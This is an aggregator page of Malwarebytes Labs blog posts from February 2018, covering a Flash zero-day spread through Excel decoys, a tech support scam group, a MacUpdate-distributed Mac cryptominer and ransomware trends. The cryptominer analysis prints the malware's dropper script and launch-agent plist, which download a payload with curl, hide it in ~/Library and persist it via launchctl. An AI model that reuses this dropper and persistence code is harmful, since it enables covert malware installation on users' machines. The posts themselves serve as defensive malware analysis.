Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.

Threat actors used a decoy Microsoft Excel document to lure their intended target (some South Korea users) in order to infect them with a remote administration tool named ROKRAT. While not obvious at first, an ActiveX object has been embedded into the document and contains the Flash exploit. Highlighting cells reveals a small white rectangle that represents the embedded object:

Upon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:

  • a unique identifier
  • the Flash Player version
  • the Operating System version

This is an important step because it retrieves a key used to decrypt the malicious shell code.

By the time we had access to this sample, the websites hosting it were down, which proved to be a showstopper in the exploitation and payload. Malwarebytes detects the remote administration tool that was dropped, as well as blocks the sites known to have hosted the key and payload.

Adobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall the Flash Player. We expect that this exploit will be used in larger scale attacks, including via malicious spam. We will keep you updated of any further developments.

Indicators of compromise[.]kr/design/m/images/image/image.php?[.]kr

SWF exploit


The post New Flash Player zero-day comes inside Office document appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (January 29 – February 04)

Malwarebytes - Mon, 02/05/2018 - 18:45

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdater that can be distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017, and then began to fizzle like a dying firecracker at end of the year onwards.

Other news

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Boomerang spam bombs Malwarebytes forum—not a smart move

Malwarebytes - Mon, 02/05/2018 - 17:57

Tech support scammers are generally not the best and brightest. As such, they will occasionally post ads for their fake companies in the comment sections here or on the Malwarebytes forums. Last week, however, scammers struggled with configuring their spambots, resulting in spam bombs on the forum lasting roughly 72 hours, with a slow taper down for two more days.

Over six days, 246 spam accounts associated with this activity were banned. We wondered what threat actor group would exercise such phenomenally poor judgment, so we drilled down a bit into who these people are.

As it turns out, the majority of the spam was posted for a threat actor we were already familiar with: Boomerang Tech Solutions. Boomerang scams using an AV theme, so they need to use the Malwarebytes brand to appear properly comprehensive to victims. They will also look to legitimate AV customers for scam targeting. Over the past year, Boomerang has:

  • Posted ads to our forums
  • Posted ads to blog comment sections
  • Maintained Twitter accounts to direct traffic to their domains
  • Monitored the Facebook pages of various AV companies to find customers requesting tech support. They then targeted those customers with linked phone numbers, claiming to be the company in question.
  • Made outbound calls to victims as Malwarebytes, then subsequently deleted MBAM from victim systems

As you can imagine, this behavior has not endeared them to US-based merchant processors, leaving them with pay by check as the primary payment option. (More on why alternative payment options tend to be bad here.)


Our counterfraud team has observed the following Indicators of Compromise (IOCs) related to Boomerang activity:

Website Twitter handle Antivirus-support-number[.]com @Malwrebytes ‏ Boomerangtechnologies[.]info @malwarebytes4 ‏ www.antivirustechnicalhelp[.]com @malwarebytes_ ‏ www.wisdomsquad[.]com @malwarebytetech ‏ www.seccurityexperts[.]com @quickencontact2 ‏ liveantivirushelp[.]com n/a antivirusconsulting[.]com n/a


How Boomerang rips us off

When Boomerang first came on our radar about a year ago, we called them up to see precisely how victims are being targeted. As you can see in the video of our call below, there’s nothing at all original here. Boomerang tells us that we are bedeviled by “illegal connections” sending our data overseas. The only slightly unusual parts are the relatively high quality of their website (most of these guys struggle with HTML), and the phone rep who told us that Malwarebytes does not protect from “viruses coming from the Internet.” Check out the video to see the standard Boomerang pitch.

How to stay safe

First and foremost, be a little extra suspicious of any company that is resistant to accept payment with a credit card. If they can’t process credit payments easily, there’s probably a good (bad) reason why. If you’ve had a run-in with these or any other tech support scammer (on our site, forum, or anywhere else), you can find information on what to do next here.

Have you been contacted by someone claiming to be us or our representative? See how to evaluate those claims here. Lastly, if you’ve dealt with anyone from Boomerang yourself, post to the comments below to let others know your experience. Stay suspicious and stay safe.

The post Boomerang spam bombs Malwarebytes forum—not a smart move appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Mac cryptominer distributed via a MacUpdate hack

Malwarebytes - Fri, 02/02/2018 - 21:20

Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer’s CPU to mine the Monero currency.

The malware was spread via hack of the MacUpdate site, which was distributing maliciously-modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.

Both OnyX and Deeper are products made by Titanium Software (, but the site was changed maliciously to point to download URLs at, a domain first registered on January 23, and whose ownership is obscured. The fake Firefox app was distributed from (Notice the domain ends in, which is definitely not the same as This is a common scammer trick to make you think it’s coming from a legitimate site.)

The downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, as would the original, non-malicious .dmg files for those apps.

The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation of these applications had a low bar for entry.

Once the application has been installed, when the user opens it, it will download and install the payload from (a legitimate site owned by Adobe). Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.

However, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.

The “script” file inside the app takes care of opening the decoy app, and then downloading and installing the malware.

open if [ -f ~/Library/mdworker/mdworker ]; then killall Deeperd else nohup curl -o ~/Library/ content_disposition=attachment && unzip -o ~/Library/ -d ~/Library && mkdir -p ~/Library/LaunchAgents && mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents && sleep 300 && launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist && rm -rf ~/Library/ && killall Deeperd & fi

For those who can’t read shell scripts, this code first attempts to open the decoy, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.

If the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is hidden in macOS by default, so most users wouldn’t even know anything had been added there. It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>Label</key> <string>MacOSupdate</string> <key>ProgramArguments</key> <array> <string>sh</string> <string>-c</string> <string>launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm -rf ~/Library/LaunchAgents/MacOS.plist && curl -o ~/Library/LaunchAgents/MacOS.plist content_disposition=attachment && launchctl load -w ~/Library/LaunchAgents/MacOS.plist && ~/Library/mdworker/mdworker</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist>

When this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove the previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist file that we obtained did the real work.

sh -c ~/Library/mdworker/sysmdworker -user -xmr

This loads a malicious sysmdworker process, passing in a couple arguments, one of which is an email address.

That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to, passing in the above email address as the login.

There are multiple takeaways from this. First and foremost, never download software from any kind of “download aggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.

Instead, always download software directly from the developer’s site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. Be sure to check around to make sure the software is legitimate before downloading, but do not give full credence to ratings or reviews on third-party sites or the Mac App Store, as those can be faked.

Second, if you have downloaded a new application and it seems not to be functioning as expected—such as not opening at all when you double-click it—be suspicious. Consider scanning your computer with security software. Malwarebytes for Mac will detect this malware as OSX.CreativeUpdater.

Finally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is proven to be increasingly false. This is the third piece of Mac malware so far this year, following OSX.MaMi and OSX.CrossRAT. That doesn’t even consider the wide variety of adware and junk software out there. Do not let yourself believe that Macs don’t get infected, as that will make you more vulnerable.

The post New Mac cryptominer distributed via a MacUpdate hack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Ransomware’s difficult second album

Malwarebytes - Fri, 02/02/2018 - 15:00

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically —to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:

Click to enlarge

Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing TOR onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.

Click to enlarge

Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and increased public visibility after some huge outbreaks 2017, advances in security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

There is a cyclical nature to attacks. They tend to swing from stealth being the “in” thing, to overt displays of fireworks on your desktop, to covert action becoming the new (old) hotness, and so on. Back in the day, old-school adware vendors had their programs bundled alongside other spyware, and the desktop would be ablaze with pop-ups, pop-unders, sliders, extensions—you name it. The idea was to generate as many ad impressions as possible before the affiliate networks were shut down. A quick apology, “It’ll never happen again,” and sure enough, they’d be right back at it a few days later.

Once security tools and public awareness had reached a tipping point and big legal things started to happen, many vendors went broke or moved onto pastures new. Those that remained knew they had to go dark, and from about 2008 onward you started to see a lot less fireworks and a lot more invisible assassins. (Well, not see them, exactly, given they were invisible, but anyway.)

Stealthy malware and silent botnets clinging onto a PC as covertly as possible for as long as they could was the order of the day. Eventually, these methods, too, fell out of favour, and cybercriminals started to ramp up more visible scams in the form of the evergreen fake antivirus/tech support scams, and social engineering on social media portals.

We’re seeing a similar pattern now with ransomware. Ransomware catches plenty of victims out the gate, but not so much once everyone has wised up a little. If ransomware groups can’t even get their hands on Bitcoins by wandering into a victim’s home at 2am and loudly announcing the takeover of their PC, it’s surely a lot easier to jump on the cryptomining craze and return to the digital shadows.

Click to enlarge

The advantages to moving into stealth mode are obvious. First, there are no more splashy takeovers. Splashy takeovers don’t last long on PCs these days. Second, the movement to covertly mine for coins using the victim’s GPU horsepower—without them knowing about it—has potential for longer-term gains. That’s the theory, at least; in reality, many people will notice fans spinning up, or computers under higher load or just plain old not responding. Even so, a lot of those people may just pass it off as “one of those things my computer does.” It’s a trade off, and not likely to make more money than kicking the door in and screaming for free coins, but it’s definitely a lot sneakier.

Finally, it’s a lot less hassle to just throw some script on a website, as opposed build the ransomware, pay some developers, mess around with onion sites, write up long FAQs for the victims, maintain C&C servers, ensure the decryption of hijacked files actually works, and so on. And cybercriminals delivering any kind of attack have noticed.

As we said in our blog on the 2017 State of Malware report:

Alongside a sudden cryptocurrency craze, bad actors have started utilizing cryptomining tools for their own profit, using victim system resources in the process. This includes compromised websites serving drive-by mining code, a significant increase of miners through malicious spam and exploit kit drops, and adware bundlers pushing miners instead of toolbars. By the end of 2017, basically anyone doing any kind of cybercrime was also likely dabbling in cryptomining.

It isn’t just scripts mining for coins in the background of low traffic, unknown websites, either. In the last few days, we’ve also seen signs of Google’s DoubleClick ads on Youtube serving as the launchpad for Coinhive mining scripts. If you’re hunting around for websites for your kids, you may well run into mining scripts there, too. This kind of furtive mining is a bit of a fast moving plague, and throws the old arguments over blocking ads while hurting publishers to the foreground once more.

And while we’re talking about paths of least resistance, there are many other types of scams taking aim at digital coins; the sky is the limit, and bad actors don’t seem worried about locking themselves into the same old tried and tested methods.

Everywhere you look, digital currency is causing headaches across the board. Malware miners. Fake wallets in official mobile stores. Covert scripts quietly gobbling up power cycles in the background. Gamers unable to buy graphics cards due to miners hogging stock, resulting in shops selling them at a discount with gaming components. Even fake fonts are in on the act.

Click to enlarge

Ransomware: not dead yet

Ransomware may be losing its cool factor, but it’s definitely not dead and buried—not by a long shot. Many ransomware authors appear to be in bit of a self-imposed time out. Except these guys aren’t feeling guilty. It’s more like “let’s see what horrible new thing we can come up with next.”

There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds